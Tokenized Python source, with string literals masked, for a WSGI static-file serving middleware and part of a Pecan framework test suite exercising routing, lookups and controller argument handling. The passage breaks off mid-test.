<s> """<STR_LIT>""" <EOL> import os <EOL> import mimetypes <EOL> from datetime import datetime <EOL> from time import gmtime <EOL> import six <EOL> class FileWrapper ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , file , buffer_size = <NUM_LIT> ) : <EOL> self . file = file <EOL> self . buffer_size = buffer_size <EOL> def close ( self ) : <EOL> if hasattr ( self . file , '<STR_LIT>' ) : <EOL> self . file . close ( ) <EOL> def __iter__ ( self ) : <EOL> return self <EOL> def next ( self ) : <EOL> data = self . file . read ( self . buffer_size ) <EOL> if data : <EOL> return data <EOL> raise StopIteration ( ) <EOL> if six . PY3 : <EOL> FileWrapper . __next__ = FileWrapper . next <EOL> def wrap_file ( environ , file , buffer_size = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> return environ . get ( '<STR_LIT>' , FileWrapper ) ( file , buffer_size ) <EOL> def _dump_date ( d , delim ) : <EOL> """<STR_LIT>""" <EOL> if d is None : <EOL> d = gmtime ( ) <EOL> elif isinstance ( d , datetime ) : <EOL> d = d . utctimetuple ( ) <EOL> elif isinstance ( d , ( int , float ) ) : <EOL> d = gmtime ( d ) <EOL> return '<STR_LIT>' % ( <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) [ d . tm_wday ] , <EOL> d . tm_mday , delim , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) [ d . tm_mon - <NUM_LIT:1> ] , <EOL> delim , str ( d . tm_year ) , d . tm_hour , d . tm_min , d . tm_sec <EOL> ) <EOL> def http_date ( timestamp = None ) : <EOL> """<STR_LIT>""" <EOL> return _dump_date ( timestamp , '<STR_LIT:U+0020>' ) <EOL> class StaticFileMiddleware ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , app , directory , fallback_mimetype = '<STR_LIT>' ) : <EOL> self . app = app <EOL> self . loader = self . get_directory_loader ( directory ) <EOL> self . fallback_mimetype = fallback_mimetype <EOL> def _opener ( self , filename ) : <EOL> return lambda : ( <EOL> open ( filename , '<STR_LIT:rb>' ) , <EOL> datetime . utcfromtimestamp ( os . path . getmtime ( filename ) ) , <EOL> int ( os . path . getsize ( filename ) ) <EOL> ) <EOL> def get_directory_loader ( self , directory ) : <EOL> def loader ( path ) : <EOL> path = path or directory <EOL> if path is not None : <EOL> path = os . path . join ( directory , path ) <EOL> if os . path . isfile ( path ) : <EOL> return os . path . basename ( path ) , self . _opener ( path ) <EOL> return None , None <EOL> return loader <EOL> def __call__ ( self , environ , start_response ) : <EOL> cleaned_path = environ . get ( '<STR_LIT>' , '<STR_LIT>' ) . strip ( '<STR_LIT:/>' ) <EOL> for sep in os . sep , os . altsep : <EOL> if sep and sep != '<STR_LIT:/>' : <EOL> cleaned_path = cleaned_path . replace ( sep , '<STR_LIT:/>' ) <EOL> path = '<STR_LIT:/>' . join ( [ '<STR_LIT>' ] + [ x for x in cleaned_path . split ( '<STR_LIT:/>' ) <EOL> if x and x != '<STR_LIT:..>' ] ) <EOL> real_filename , file_loader = self . loader ( path [ <NUM_LIT:1> : ] ) <EOL> if file_loader is None : <EOL> return self . app ( environ , start_response ) <EOL> guessed_type = mimetypes . guess_type ( real_filename ) <EOL> mime_type = guessed_type [ <NUM_LIT:0> ] or self . fallback_mimetype <EOL> f , mtime , file_size = file_loader ( ) <EOL> headers = [ ( '<STR_LIT>' , http_date ( ) ) ] <EOL> headers . append ( ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> headers . extend ( ( <EOL> ( '<STR_LIT:Content-Type>' , mime_type ) , <EOL> ( '<STR_LIT>' , str ( file_size ) ) , <EOL> ( '<STR_LIT>' , http_date ( mtime ) ) <EOL> ) ) <EOL> start_response ( '<STR_LIT>' , headers ) <EOL> return wrap_file ( environ , f ) </s>
<s> import time <EOL> from json import dumps , loads <EOL> import warnings <EOL> from webtest import TestApp <EOL> from six import b as b_ <EOL> from six import u as u_ <EOL> import webob <EOL> import mock <EOL> from pecan import Pecan , expose , abort , Request , Response <EOL> from pecan . rest import RestController <EOL> from pecan . hooks import PecanHook , HookController <EOL> from pecan . tests import PecanTestCase <EOL> class TestThreadingLocalUsage ( PecanTestCase ) : <EOL> @ property <EOL> def root ( self ) : <EOL> class RootController ( object ) : <EOL> @ expose ( ) <EOL> def index ( self , req , resp ) : <EOL> assert isinstance ( req , webob . BaseRequest ) <EOL> assert isinstance ( resp , webob . Response ) <EOL> return '<STR_LIT>' <EOL> @ expose ( ) <EOL> def warning ( self ) : <EOL> return ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> @ expose ( generic = True ) <EOL> def generic ( self ) : <EOL> return ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> @ generic . when ( method = '<STR_LIT>' ) <EOL> def generic_put ( self , _id ) : <EOL> return ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return RootController <EOL> def test_locals_are_not_used ( self ) : <EOL> with mock . patch ( '<STR_LIT>' , side_effect = AssertionError ( ) ) : <EOL> app = TestApp ( Pecan ( self . root ( ) , use_context_locals = False ) ) <EOL> r = app . get ( '<STR_LIT:/>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> self . assertRaises ( AssertionError , Pecan , self . root ) <EOL> def test_threadlocal_argument_warning ( self ) : <EOL> with mock . patch ( '<STR_LIT>' , side_effect = AssertionError ( ) ) : <EOL> app = TestApp ( Pecan ( self . root ( ) , use_context_locals = False ) ) <EOL> self . assertRaises ( <EOL> TypeError , <EOL> app . get , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test_threadlocal_argument_warning_on_generic ( self ) : <EOL> with mock . patch ( '<STR_LIT>' , side_effect = AssertionError ( ) ) : <EOL> app = TestApp ( Pecan ( self . root ( ) , use_context_locals = False ) ) <EOL> self . assertRaises ( <EOL> TypeError , <EOL> app . get , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test_threadlocal_argument_warning_on_generic_delegate ( self ) : <EOL> with mock . patch ( '<STR_LIT>' , side_effect = AssertionError ( ) ) : <EOL> app = TestApp ( Pecan ( self . root ( ) , use_context_locals = False ) ) <EOL> self . assertRaises ( <EOL> TypeError , <EOL> app . put , <EOL> '<STR_LIT>' <EOL> ) <EOL> class TestIndexRouting ( PecanTestCase ) : <EOL> @ property <EOL> def app_ ( self ) : <EOL> class RootController ( object ) : <EOL> @ expose ( ) <EOL> def index ( self , req , resp ) : <EOL> assert isinstance ( req , webob . BaseRequest ) <EOL> assert isinstance ( resp , webob . Response ) <EOL> return '<STR_LIT>' <EOL> return TestApp ( Pecan ( RootController ( ) , use_context_locals = False ) ) <EOL> def test_empty_root ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT:/>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_index ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_index_html ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> class TestManualResponse ( PecanTestCase ) : <EOL> def test_manual_response ( self ) : <EOL> class RootController ( object ) : <EOL> @ expose ( ) <EOL> def index ( self , req , resp ) : <EOL> resp = webob . Response ( resp . environ ) <EOL> resp . body = b_ ( '<STR_LIT>' ) <EOL> return resp <EOL> app = TestApp ( Pecan ( RootController ( ) , use_context_locals = False ) ) <EOL> r = app . get ( '<STR_LIT:/>' ) <EOL> assert r . body == b_ ( '<STR_LIT>' ) , r . body <EOL> class TestDispatch ( PecanTestCase ) : <EOL> @ property <EOL> def app_ ( self ) : <EOL> class SubSubController ( object ) : <EOL> @ expose ( ) <EOL> def index ( self , req , resp ) : <EOL> assert isinstance ( req , webob . BaseRequest ) <EOL> assert isinstance ( resp , webob . Response ) <EOL> return '<STR_LIT>' <EOL> @ expose ( ) <EOL> def deeper ( self , req , resp ) : <EOL> assert isinstance ( req , webob . BaseRequest ) <EOL> assert isinstance ( resp , webob . Response ) <EOL> return '<STR_LIT>' <EOL> class SubController ( object ) : <EOL> @ expose ( ) <EOL> def index ( self , req , resp ) : <EOL> assert isinstance ( req , webob . BaseRequest ) <EOL> assert isinstance ( resp , webob . Response ) <EOL> return '<STR_LIT>' <EOL> @ expose ( ) <EOL> def deeper ( self , req , resp ) : <EOL> assert isinstance ( req , webob . BaseRequest ) <EOL> assert isinstance ( resp , webob . Response ) <EOL> return '<STR_LIT>' <EOL> sub = SubSubController ( ) <EOL> class RootController ( object ) : <EOL> @ expose ( ) <EOL> def index ( self , req , resp ) : <EOL> assert isinstance ( req , webob . BaseRequest ) <EOL> assert isinstance ( resp , webob . Response ) <EOL> return '<STR_LIT:/>' <EOL> @ expose ( ) <EOL> def deeper ( self , req , resp ) : <EOL> assert isinstance ( req , webob . BaseRequest ) <EOL> assert isinstance ( resp , webob . Response ) <EOL> return '<STR_LIT>' <EOL> sub = SubController ( ) <EOL> return TestApp ( Pecan ( RootController ( ) , use_context_locals = False ) ) <EOL> def test_index ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT:/>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT:/>' ) <EOL> def test_one_level ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_one_level_with_trailing ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_two_levels ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_two_levels_with_trailing ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> def test_three_levels ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> class TestLookups ( PecanTestCase ) : <EOL> @ property <EOL> def app_ ( self ) : <EOL> class LookupController ( object ) : <EOL> def __init__ ( self , someID ) : <EOL> self . someID = someID <EOL> @ expose ( ) <EOL> def index ( self , req , resp ) : <EOL> return '<STR_LIT>' % self . someID <EOL> @ expose ( ) <EOL> def name ( self , req , resp ) : <EOL> return '<STR_LIT>' % self . someID <EOL> class RootController ( object ) : <EOL> @ expose ( ) <EOL> def index ( self , req , resp ) : <EOL> return '<STR_LIT:/>' <EOL> @ expose ( ) <EOL> def _lookup ( self , someID , * remainder ) : <EOL> return LookupController ( someID ) , remainder <EOL> return TestApp ( Pecan ( RootController ( ) , use_context_locals = False ) ) <EOL> def test_index ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT:/>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT:/>' ) <EOL> def test_lookup ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_lookup_with_method ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_lookup_with_wrong_argspec ( self ) : <EOL> class RootController ( object ) : <EOL> @ expose ( ) <EOL> def _lookup ( self , someID ) : <EOL> return '<STR_LIT>' <EOL> with warnings . catch_warnings ( ) : <EOL> warnings . simplefilter ( "<STR_LIT:ignore>" ) <EOL> app = TestApp ( Pecan ( RootController ( ) , use_context_locals = False ) ) <EOL> r = app . get ( '<STR_LIT>' , expect_errors = True ) <EOL> assert r . status_int == <NUM_LIT> <EOL> class TestCanonicalLookups ( PecanTestCase ) : <EOL> @ property <EOL> def app_ ( self ) : <EOL> class LookupController ( object ) : <EOL> def __init__ ( self , someID ) : <EOL> self . someID = someID <EOL> @ expose ( ) <EOL> def index ( self , req , resp ) : <EOL> return self . someID <EOL> class UserController ( object ) : <EOL> @ expose ( ) <EOL> def _lookup ( self , someID , * remainder ) : <EOL> return LookupController ( someID ) , remainder <EOL> class RootController ( object ) : <EOL> users = UserController ( ) <EOL> return TestApp ( Pecan ( RootController ( ) , use_context_locals = False ) ) <EOL> def test_canonical_lookup ( self ) : <EOL> assert self . app_ . get ( '<STR_LIT>' , expect_errors = <NUM_LIT> ) . status_int == <NUM_LIT> <EOL> assert self . app_ . get ( '<STR_LIT>' , expect_errors = <NUM_LIT> ) . status_int == <NUM_LIT> <EOL> assert self . app_ . get ( '<STR_LIT>' ) . status_int == <NUM_LIT> <EOL> assert self . app_ . get ( '<STR_LIT>' ) . body == b_ ( '<STR_LIT:100>' ) <EOL> class TestControllerArguments ( PecanTestCase ) : <EOL> @ property <EOL> def app_ ( self ) : <EOL> class RootController ( object ) : <EOL> @ expose ( ) <EOL> def index ( self , req , resp , id ) : <EOL> return '<STR_LIT>' % id <EOL> @ expose ( ) <EOL> def multiple ( self , req , resp , one , two ) : <EOL> return '<STR_LIT>' % ( one , two ) <EOL> @ expose ( ) <EOL> def optional ( self , req , resp , id = None ) : <EOL> return '<STR_LIT>' % str ( id ) <EOL> @ expose ( ) <EOL> def multiple_optional ( self , req , resp , one = None , two = None , <EOL> three = None ) : <EOL> return '<STR_LIT>' % ( one , two , three ) <EOL> @ expose ( ) <EOL> def variable_args ( self , req , resp , * args ) : <EOL> return '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( args ) <EOL> @ expose ( ) <EOL> def variable_kwargs ( self , req , resp , ** kwargs ) : <EOL> data = [ <EOL> '<STR_LIT>' % ( key , kwargs [ key ] ) <EOL> for key in sorted ( kwargs . keys ( ) ) <EOL> ] <EOL> return '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( data ) <EOL> @ expose ( ) <EOL> def variable_all ( self , req , resp , * args , ** kwargs ) : <EOL> data = [ <EOL> '<STR_LIT>' % ( key , kwargs [ key ] ) <EOL> for key in sorted ( kwargs . keys ( ) ) <EOL> ] <EOL> return '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( list ( args ) + data ) <EOL> @ expose ( ) <EOL> def eater ( self , req , resp , id , dummy = None , * args , ** kwargs ) : <EOL> data = [ <EOL> '<STR_LIT>' % ( key , kwargs [ key ] ) <EOL> for key in sorted ( kwargs . keys ( ) ) <EOL> ] <EOL> return '<STR_LIT>' % ( <EOL> id , <EOL> dummy , <EOL> '<STR_LIT:U+002CU+0020>' . join ( list ( args ) + data ) <EOL> ) <EOL> @ expose ( ) <EOL> def _route ( self , args , request ) : <EOL> if hasattr ( self , args [ <NUM_LIT:0> ] ) : <EOL> return getattr ( self , args [ <NUM_LIT:0> ] ) , args [ <NUM_LIT:1> : ] <EOL> else : <EOL> return self . index , args <EOL> return TestApp ( Pecan ( RootController ( ) , use_context_locals = False ) ) <EOL> def test_required_argument ( self ) : <EOL> try : <EOL> r = self . app_ . get ( '<STR_LIT:/>' ) <EOL> assert r . status_int != <NUM_LIT:200> <EOL> except Exception as ex : <EOL> assert type ( ex ) == TypeError <EOL> assert ex . args [ <NUM_LIT:0> ] in ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_single_argument ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_single_argument_with_encoded_url ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_two_arguments ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' , status = <NUM_LIT> ) <EOL> assert r . status_int == <NUM_LIT> <EOL> def test_keyword_argument ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_keyword_argument_with_encoded_url ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_argument_and_keyword_argument ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_encoded_argument_and_keyword_argument ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_explicit_kwargs ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT:/>' , { '<STR_LIT:id>' : '<STR_LIT:4>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_path_with_explicit_kwargs ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { '<STR_LIT:id>' : '<STR_LIT>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_kwargs ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_kwargs_from_root ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT:/>' , { '<STR_LIT:id>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_positional_arguments ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_positional_arguments_with_url_encode ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_positional_arguments_with_kwargs ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_positional_arguments_with_url_encoded_kwargs ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_positional_args_with_dictionary_kwargs ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_positional_args_with_url_encoded_dictionary_kwargs ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_optional_arg ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_url_encoded ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_missing ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' , status = <NUM_LIT> ) <EOL> assert r . status_int == <NUM_LIT> <EOL> def test_multiple_with_kwargs ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_with_url_encoded_kwargs ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_args_with_url_encoded_kwargs ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_url_encoded_positional_args ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_optional_arg_with_kwargs ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { '<STR_LIT:id>' : '<STR_LIT:4>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_optional_arg_with_url_encoded_kwargs ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { '<STR_LIT:id>' : '<STR_LIT>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_positional_arguments_with_dictionary_kwargs ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { '<STR_LIT:id>' : '<STR_LIT>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_positional_url_encoded_arguments_with_kwargs ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { '<STR_LIT:id>' : '<STR_LIT>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_optional_arg_with_multiple_kwargs ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_optional_arg_with_multiple_url_encoded_kwargs ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_optional_arg_with_multiple_dictionary_kwargs ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { '<STR_LIT:id>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_optional_arg_with_multiple_url_encoded_dictionary_kwargs ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_positional_args ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_positional_args_one_arg ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_positional_args_one_url_encoded_arg ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_positional_args_all_args ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_positional_args_all_url_encoded_args ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_positional_args_too_many_args ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' , status = <NUM_LIT> ) <EOL> assert r . status_int == <NUM_LIT> <EOL> def test_multiple_optional_positional_args_with_kwargs ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_positional_args_with_url_encoded_kwargs ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_positional_args_with_string_kwargs ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_positional_args_with_encoded_str_kwargs ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_positional_args_with_dict_kwargs ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT:1>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_positional_args_with_encoded_dict_kwargs ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_positional_args_and_dict_kwargs ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_encoded_positional_args_and_dict_kwargs ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_args_with_multiple_kwargs ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_args_with_multiple_encoded_kwargs ( self ) : <EOL> r = self . app_ . get ( <EOL> '<STR_LIT>' <EOL> ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_args_with_multiple_dict_kwargs ( self ) : <EOL> r = self . app_ . post ( <EOL> '<STR_LIT>' , <EOL> { '<STR_LIT>' : '<STR_LIT:1>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT>' : '<STR_LIT:3>' , '<STR_LIT>' : '<STR_LIT:4>' } <EOL> ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_args_with_multiple_encoded_dict_kwargs ( self ) : <EOL> r = self . app_ . post ( <EOL> '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:4>' <EOL> } <EOL> ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_args_with_last_kwarg ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_args_with_last_encoded_kwarg ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_args_with_middle_arg ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT:2>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_variable_args ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_variable_args ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_encoded_variable_args ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int 